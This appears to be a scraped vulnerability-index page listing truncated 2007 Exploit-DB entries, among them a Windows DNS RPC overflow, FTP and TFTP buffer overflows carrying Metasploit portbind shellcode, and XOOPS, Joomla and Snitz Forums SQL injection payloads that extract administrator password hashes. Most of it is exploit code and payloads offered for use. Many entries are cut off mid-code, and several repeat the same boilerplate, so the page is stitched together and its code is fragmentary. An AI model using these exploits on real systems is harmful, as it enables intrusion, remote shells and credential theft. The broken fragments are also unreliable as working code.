#die "Usage $0 " unless ($ARGV[2]);
die "Usage $0 " unless ($ARGV[0]);
my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort => $ARGV[3], Proto => 'udp');
$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060', Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061');
$touser=$ARGV[0];
$target=$ARGV[1];
$sourceaddress=$ARGV[2];
$sourceport=$ARGV[3];
$high=2000;
$low=1;
$fromuserid = int(rand( $high-$low+1 ) ) + $low;
my $cseq = "INVITE";
$msg = "INVITE sip:$touser\@$target SIP/2.0\r
Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r
From: \377;tag=779\r
To: Receiver \r
Call-ID: 10\@$sourceaddress\r
CSeq: 1 $cseq\r
Contact: 779 \r
Expire
Exploit-DB
Microsoft Windows - DNS DnssrvQuery Remote Stack Overflow
exploitdb·2007-04-15·CVSS 10.0
CVE-2007-1748 [CRITICAL] Microsoft Windows - DNS DnssrvQuery Remote Stack Overflow
Microsoft Windows - DNS DnssrvQuery Remote Stack Overflow
---
/*
* Copyright (c) 2007 devcode
*
*
* ^^ D E V C O D E ^^
*
* Windows DNS DnssrvQuery() Stack Overflow
* [CVE-2007-1748]
*
*
* Description:
* A vulnerability has been reported in Microsoft Windows, which can
* be exploited by malicious people to compromise a vulnerable system.
* The vulnerability is caused due to a boundary error in an RPC interface
* of the DNS service used for remote management of the service. This can
* be exploited to cause a stack-based buffer overflow via a specially
* crafted RPC request. The DnssrvQuery function is vulnerable to this stack
* overflow.
*
*
* Hotfix/Patch:
* None as of this time.
*
* Vulnerable systems:
* Microsoft Windows 2000 Advanced Server
* Microsoft Windows 2000 Datacenter Server
*
Exploit-DB
Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow
exploitdb·2007-04-15
CVE-2007-1748 Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow
Microsoft Windows Server 2000 SP4 - DNS RPC Remote Buffer Overflow
---
#!/usr/bin/python
# Remote exploit for the 0day Windows DNS RPC service vulnerability as
# described in https://www.securityfocus.com/bid/23470/info. Tested on
# Windows 2000 SP4. The exploit if successful binds a shell to TCP port 4444
# and then connects to it.
#
# Cheers to metasploit for the first exploit.
# Written for educational and testing purposes.
# Author shall bear no responsibility for any damage caused by using this code
# Winny Thomas :-)
import os
import sys
import time
from impacket.dcerpc import transport, dcerpc, epm
from impacket import uuid
#Portbind shellcode from metasploit; Binds port to TCP port 4444
shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
shellcode +=
Exploit-DB
Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution
exploitdb·2007-04-10
CVE-2007-2001 Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution
Crea-Book 1.0 - Admin Access Bypass / Database Disclosure / Code Execution
---
/=======================================\
| Advisory :: Crea-Book [fr/en] |
| Date : 2007-04-10 |
| Last update : 2007-04-10 |
| |
+-------------------------------------------------------------------------------------------------------+
| Summary : 0] Description |
| 1] Vuln#1 : Administrative Access Bypass using basic SQL injection |
| 2] Vuln#2 : PHP Code Execution Weakness |
| 3] Links & Documentation |
\-------------------------------------------------------------------------------------------------------/
DESCRIPTION
This script is old but analysing it is a good way to understand some classic security holes in web
applications. It's just a good and fast training.
Let's g0 ...
VULNERABILITY #1 : ADMINI
Exploit-DB
Wserve HTTP Server 4.6 - Long Directory Name Denial of Service
exploitdb·2007-04-05
CVE-2007-2367 Wserve HTTP Server 4.6 - Long Directory Name Denial of Service
Wserve HTTP Server 4.6 - Long Directory Name Denial of Service
---
#!perl
# Wserve HTTP Server 4.6 Version (Long Directory Name) Buffer Overflow - Denial Of Service
# Type :
# Buffer Overflow - Denial of Service
# Release Date :
# {2007-04-05}
# Product / Vendor :
# Wserve HTTP Server
# http://sourceforge.net/projects/whttp
# PoC :
# GET / HTTP/1.0\r\n /127.0.0.1:80/AAAAAA[2000].
# Error :
# Buffer Overrun Detected!
# Program:...~\Temp\Rar$EX00.906\wserve\wserve_console.exe
# A buffer overrun has been detected which has corrupted the program's internal state.The program cannot safely continue
# execution and must now be terminated
# Exploit :
use LWP::UserAgent;
$unique = LWP::UserAgent->new;
$address = shift or die("Insert A Target");
$req = HTTP::Request->new(POST => "http://$addr
Exploit-DB
XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection
exploitdb·2007-04-04
CVE-2007-1962 XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection
XOOPS Module WF-Snippets 1.02 (c) - Blind SQL Injection
---
XOOPS Module WF-Snippets
//'===============================================================================================
//'[Script Name: XOOPS Module WF-Snippets ', 0) == -1) {
alert('False');
}
if (document.getElementById('mesaj').value.indexOf('', 0) != -1) {
alert('TRUEEEEEEE');
}
}
function dal() {
if (document.getElementById('buton').value == "Test Character(0)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=48)/*');
document.getElementById('buton').value = "Test Character(1)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton')
Exploit-DB
XOOPS Module XFsection 1.07 - 'articleId' Blind SQL Injection
exploitdb·2007-04-02
CVE-2007-1974 XOOPS Module XFsection 1.07 - 'articleId' Blind SQL Injection
XOOPS Module XFsection 1.07 - 'articleId' Blind SQL Injection
---
XOOPS Module XFsection
//'===============================================================================================
//'[Script Name: XOOPS Module XFsection ', 0) == -1) {
alert('False');
}
if (document.getElementById('mesaj').value.indexOf('', 0) != -1) {
alert('TRUEEEEEEE');
}
}
function dal() {
if (document.getElementById('buton').value == "Test Character(0)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=48)/*');
document.getElementById('buton').value = "Test Character(1)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton
Exploit-DB
IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow
exploitdb·2007-04-01
CVE-2005-1255 IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow
IPSwitch IMail Server 8.20 - IMAPD Remote Buffer Overflow
---
/* Dreatica-FXP crew
*
* ----------------------------------------
* Target : Ipswitch IMAIL Server IMAPD 7.13 - 8.20 exploit
* Site : http://www.ipswitch.com
* Found by : iDEFENSE Security (http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=243)
* ----------------------------------------
* Exploit date : 31.03.2007
* Exploit writer : Heretic2 ([email protected])
* OS : Windows 2000 SP4 and Windows XP ALL
* Crew : Dreatica-FXP
* ----------------------------------------
* Info: Well, this is the realization of the IMAIL IMAPd 'LOGIN' buffer overflow vulnerability.
* The version provided by kcope uses SEH overwrite method, which doesn't work on Windows XP SP2,
* so i have written the exploit that overwrites EI
Exploit-DB
XOOPS Module debaser 0.92 - 'genre.php' Blind SQL Injection
exploitdb·2007-04-01
CVE-2007-1805 XOOPS Module debaser 0.92 - 'genre.php' Blind SQL Injection
XOOPS Module debaser 0.92 - 'genre.php' Blind SQL Injection
---
XOOPS Module debaser
//'===============================================================================================
//'[Script Name: XOOPS Module debaser ', 0) == -1) {
alert('False');
}
if (document.getElementById('mesaj').value.indexOf('', 0) != -1) {
alert('TRUEEEEEEE');
}
}
function dal() {
if (document.getElementById('buton').value == "Test Character(0)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/pass/**/FROM/**/xoops_users/**/WHERE/**/uid=1),',',1))=48)/*');
document.getElementById('buton').value = "Test Character(1)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').val
Exploit-DB
Joomla! Component D4JeZine 2.8 - Blind SQL Injection
exploitdb·2007-03-27
CVE-2007-1776 Joomla! Component D4JeZine 2.8 - Blind SQL Injection
Joomla! Component D4JeZine 2.8 - Blind SQL Injection
---
Joomla Component D4JeZine
//'===============================================================================================
//'[Script Name: Joomla Component D4JeZine ', 0) == -1) {
alert('False');
}
}
function dal() {
if (document.getElementById('buton').value == "Test Character(0)") {
document.getElementById('buton').disabled = true;
islemlink('/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/jos_users/**/WHERE/**/id=1),',',1))=48)/*');
document.getElementById('buton').value = "Test Character(1)"
setTimeout("document.getElementById('buton').disabled = false;",2000);
return false;
}
if (document.getElementById('buton').value == "Test Character(1)") {
document.getElementById('buton').disabled = true;
islemlin
Exploit-DB
FutureSoft TFTP Server 2000 - Remote Overwrite (SEH)
exploitdb·2007-03-22
CVE-2007-1645 FutureSoft TFTP Server 2000 - Remote Overwrite (SEH)
FutureSoft TFTP Server 2000 - Remote Overwrite (SEH)
---
#!/usr/bin/perl
# ===============================================================================================
# FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit
# By Umesh Wanve
# ===============================================================================================
#
# Date : 22-03-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Stack ---> buffer === AAAAA.........
# |
# Pointer to next SEH === Short Jump to Hellcode
# |
# SEH Handler === Pop, Pop, Ret (ws2help.dll win2000 sp4)
# |
# NOP Sled === Nop Sled
# |
# Hellcode === Hell.........
#
# This exploit will open port 5555 on remote server. Connect it to
Exploit-DB
Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Overflow
exploitdb·2007-03-21
CVE-2007-1579 Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Overflow
Mercur Messaging 2005 (Windows 2000 SP4) - IMAP 'Subscribe' Remote Overflow
---
#!/usr/bin/python
# Remote exploit for the stack overflow vulnerability in Mercur Messaging 2005
# SP3 IMAP service. The exploit was tested on windows 2000 server SP4 in a
# Vmware environment. At the time of overflow EBX points to our shellcode.
# However this buffer into which EBX points will give a maximum of 224 bytes of
# uninterrupted space for shellcode. So for my analysis is settled for a useradd
# shellcode which comes to 224 bytes :-). However looking at it a little bit
# further i found that you can send SUBSCRIBE request just before the actual
# command that causes the overflow and you have a shellcode space of 520 bytes
# further down the stack. So you can club the 224 bytes you get at overflow t
Exploit-DB
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow
exploitdb·2007-03-14
CVE-2007-1567 WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow
WarFTP 1.65 (Windows 2000 SP4) - 'USER' Remote Buffer Overflow
---
#!/usr/bin/python
# Remote exploit for WarFTP 1.65. Tested on Windows 2000 server SP4 inside
# VMware. A trivially exploitable stack overflow is present in WarFTP which
# can be triggered by sending a long username (>480 bytes) along with the USER
# ftp command. Maybe other commands like PASS might also be affected. I did
# not check though. This exploit binds shell on TCP port 4444 and then
# connects to it
#
# Author shall not bear any responsibility for any screw ups
# Winny Thomas :-)
import os
import sys
import time
import socket
import struct
# alphanumeric portbind shellcode from metasploit
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x3
Exploit-DB
Microsoft Windows XP/2000 - 'WinMM.dll' / '.WAV' Remote Denial of Service
exploitdb·2007-03-13
CVE-2007-1492 Microsoft Windows XP/2000 - 'WinMM.dll' / '.WAV' Remote Denial of Service
Microsoft Windows XP/2000 - 'WinMM.dll' / '.WAV' Remote Denial of Service
---
source: https://www.securityfocus.com/bid/22938/info
Microsoft Windows is prone to a denial-of-service vulnerability.
A remote attacker may exploit this vulnerability by presenting a malicious WAV file to a victim user.
Successful exploits will result in excessive CPU consumption, effectively denying service.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/29738.wav
Exploit-DB
PHP-Nuke Module Emporium 2.3.0 - SQL Injection
exploitdb·2007-02-19
CVE-2007-1034 PHP-Nuke Module Emporium 2.3.0 - SQL Injection
PHP-Nuke Module Emporium 2.3.0 - SQL Injection
---
exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1]
There is a problem! Please complete to the whole spaces"
End If
If islem
Exploit-DB
Snitz Forums 2000 3.1 SR4 - 'pop_profile.asp' SQL Injection
exploitdb·2007-02-16
CVE-2007-1023 Snitz Forums 2000 3.1 SR4 - 'pop_profile.asp' SQL Injection
Snitz Forums 2000 3.1 SR4 - 'pop_profile.asp' SQL Injection
---
=================================X=O=R=O=N=================================
Snitz Forums 2000 Version 3.1 SR4 (pop_profile.asp) Remote SQL Injection Vulnerability
=================================X=O=R=O=N=================================
Bulan: xoron
xoron.info - xoron.biz
=================================X=O=R=O=N=================================
POC: pop_profile.asp?mode=display&id=[SQL-INJ]
=================================X=O=R=O=N=================================
Username:
pop_profile.asp?mode=display&id=1
Pass:
pop_profile.asp?mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS
=================================X
Exploit-DB
LightRO CMS 1.0 - 'index.php?projectid' SQL Injection
exploitdb·2007-02-08
CVE-2007-0904 LightRO CMS 1.0 - 'index.php?projectid' SQL Injection
LightRO CMS 1.0 - 'index.php?projectid' SQL Injection
---
exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1]
There is a problem! Please complete to the whole spaces"
End If
If
Exploit-DB
LushiWarPlaner 1.0 - 'register.php' SQL Injection
exploitdb·2007-02-08
CVE-2007-0864 LushiWarPlaner 1.0 - 'register.php' SQL Injection
LushiWarPlaner 1.0 - 'register.php' SQL Injection
---
exploit2.asp
'[Update: + Get Header
'[Update: + Get Whois Info
'===============================================================================================
%>
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='There is a problem... The Data Didn\'t Take '
}
}
function write(){
setTimeout("writetext()",1000);
}
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1]
There is a problem! Please complete to the whole spaces"
End If
If isl
Exploit-DB
Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference
exploitdb·2007-02-05
CVE-2007-0811 Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference
Microsoft Internet Explorer 6 - 'mshtml.dll' Null Pointer Dereference
---
Crash (Denial of Service)
+ Where: From remote
+ Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language)
Windows 2000 Advanced Server (Korean Language)
+ Tested Software: Microsoft Internet Explorer Ver.6.0.2800.1106;SP1 (Windows 2000 Advanced Server)
Microsoft Internet Explorer Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro)
+ Solution: Not Patched (zero-day)
+ Description:
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched
Windows XP SP2 system. this bug will crash when executing a 'for' scripts.
+ The following proof-of-concept is also available:
http://www.powerhacker.net/exploit/IE_NULL_CRASH.html
-->
AmesianX, RC_No1 in powerhacker.net (
Exploit-DB
Microsoft Word 2000 - Code Execution
exploitdb·2007-02-03
CVE-2007-0515 Microsoft Word 2000 - Code Execution
Microsoft Word 2000 - Code Execution
---
############ use at your own risk *******
+ Title: Microsoft Word 2000 Unspecified Code Execution Vulnerability Exploit (0-day)
+ code by xCuter (BongGoo Kang - [email protected])
+ Critical: High Critical
+ Impact: MS Word 2000 -> Could Allow Arbitrary Command Execution
MS word 2003 -> Attempts against Word 2003/XP will consume all CPU resources and will cause a denial of service
+ Where: From remote
+ Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language)
+ Tested Software: Microsoft(R) Word 2000 (9.0.2720)
+ Solution: Not Patched (zero-day)
+ Description:
When a user opens a specially crafted Word file using a malformed string,
it may corrupt system memory in such a way that an attacker could execute arbitrary code
Exploit-DB
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow
exploitdb·2007-01-17
CVE-2006-0441 KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow
KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow
---
#!/usr/bin/perl
# Exploit for SAMI FTP version 2.0.2
# USER/PASS BUFFER OVERFLOW ARBITARY REMOTE CODE EXECUTION (CALC.exe)
# You can put you own shellcode to spawn a shell
# Thrusday 17th Jan 2007
# Tested on : Windows 2000 SP4 (Use your own return address for other flavors)
#
#
#
# Coded by UmZ! [email protected]
# On behalf of : Secure Bytes Inc.
# http://www.secure-bytes.com/exploits/
#
#
#
# Special Thanks to Ahmad Tauqeer, Ali Shuja and Uquali
#
#
# Disclaimer: This Proof of concept exploit is for educational purpose only.
# Please do not use it against any system without prior permission.
# You are responsible for yourself for what you do with this code.
#
#
# Note: After executing the exploit You will get "Ca
No writeups or analysis indexed.
http://secunia.com/advisories/24862http://www.osvdb.org/34816http://www.vupen.com/english/advisories/2007/1344https://exchange.xforce.ibmcloud.com/vulnerabilities/33555https://www.exploit-db.com/exploits/3701http://secunia.com/advisories/24862http://www.osvdb.org/34816http://www.vupen.com/english/advisories/2007/1344https://exchange.xforce.ibmcloud.com/vulnerabilities/33555https://www.exploit-db.com/exploits/3701
2007-04-12
Published